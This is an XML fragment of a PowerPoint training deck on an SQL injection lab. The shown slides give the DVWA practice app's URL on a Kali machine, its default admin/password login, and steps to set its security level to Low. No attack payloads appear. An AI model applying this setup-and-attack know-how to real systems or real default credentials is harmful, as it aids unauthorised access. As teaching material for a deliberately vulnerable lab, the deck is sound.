            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http://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&lt;Kali-IP-Address&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/dvwa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1650" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Login credentials are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>admin/password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1950" b="1" dirty="0">
              <a:latin typeface="Courier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6FD30-03D7-46A6-8C6D-116506C3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995" y="611322"/>
            <a:ext cx="2526116" cy="10060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F7956-0434-4CDA-8DE9-D1580C14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37" y="4298040"/>
            <a:ext cx="2114625" cy="17522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0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8D41-C2A8-4E8A-B668-09BC353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 DVWA’s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FC43-A4B1-4E42-8E0C-A80703E5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475285" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Click on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>DVWA Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Change the security drop down option to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>Low</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> button to set the website vulnerability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C9E6E-EB81-4E81-B119-681A4308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3" y="1898407"/>
            <a:ext cx="3379097" cy="21900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6BB78-433C-4764-8EEC-1A3905B5DD06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3899388" y="3680619"/>
            <a:ext cx="1345223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DVWA Security button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8253AD-BD80-4839-9AD8-4D46AEE7F48F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4826977" y="3343275"/>
            <a:ext cx="1015512" cy="35003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3EA408-4203-4C44-A10B-05E72778CEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7165365" y="1580567"/>
            <a:ext cx="1345223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to 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B8C77-3407-46AB-AE17-987B06A1FF71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7225851" y="1839515"/>
            <a:ext cx="554202" cy="77839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79046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</TotalTime>
  <Words>1079</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>122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SQL Injection Lab</vt:lpstr>
      <vt:lpstr>Objectives Covered</vt:lpstr>
      <vt:lpstr>What is an SQL Injection Attack?</vt:lpstr>
      <vt:lpstr>The SQL Injection Lab</vt:lpstr>
      <vt:lpstr>Setup Environments</vt:lpstr>
      <vt:lpstr>Find the IP Address (Kali Machine)</vt:lpstr>
      <vt:lpstr>Log into DVWA</vt:lpstr>
      <vt:lpstr>Lower DVWA’s Security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235</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T18:06:11Z</dcterms:modified>
</cp:coreProperties>
</file>